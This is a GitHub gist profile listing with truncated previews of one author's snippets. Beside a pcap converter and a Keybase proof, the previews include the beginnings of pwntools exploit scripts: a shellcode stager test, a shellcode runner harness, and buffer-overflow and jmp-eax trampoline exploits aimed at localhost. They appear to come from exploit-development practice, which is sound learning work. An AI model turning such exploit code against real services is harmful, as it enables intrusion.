Skip to content

Instantly share code, notes, and snippets.

View RobertLarsen's full-sized avatar

Robert Larsen RobertLarsen

152 followers · 0 following
View GitHub Profile
@RobertLarsen
RobertLarsen / base64_to_pcap.py
Created September 9, 2015 08:36
Turn a packed captured by Suricata and stored in base64 into a pcap
#!/usr/bin/env python2
import base64, struct, sys
if len(sys.argv) > 1:
try:
binary = base64.decodestring(sys.argv[1])
#File header
sys.stdout.write(struct.pack("IHHIIII",
0xa1b2c3d4, # Magic
@RobertLarsen
RobertLarsen / keybase.md
Created April 15, 2015 14:39

Keybase proof

I hereby claim:

  • I am robertlarsen on github.
  • I am robertlarsen (https://keybase.io/robertlarsen) on keybase.
  • I have a public key whose fingerprint is 14BE F756 4092 1FC9 C8E6 1806 CC33 1E8A C16A 1996

To claim this, I am signing this object:

@RobertLarsen
RobertLarsen / test.py
Created March 20, 2015 13:42
Testing stager shellcode
#!/usr/bin/env python2
from pwn import *
from time import sleep
context(arch = 'amd64', os = 'linux')
r = remote('localhost', 8888)
payload = asm(shellcraft.findpeersh())
stager = asm(shellcraft.findpeer() + shellcraft.stager('rdi', len(payload)))
@RobertLarsen
RobertLarsen / run_shellcode.c
Created March 20, 2015 12:58
Program for testing shellcode
#include <fcntl.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
@RobertLarsen
RobertLarsen / trampoline_sploit.py
Created December 1, 2014 07:48
trampoline_sploit.py
#!/usr/bin/python
from pwn import *
import sys
context(os='linux', arch='i386')
jmp_eax=0x08048bf7
host = 'localhost'
port = 9988
@RobertLarsen
RobertLarsen / bufferoverflow_sploit.py
Created December 1, 2014 07:47
bufferoverflow_sploit.py
#!/usr/bin/python
from pwn import *
import sys
context(os='linux', arch='i386')
host = 'localhost'
port = 9988
if len(sys.argv) > 1: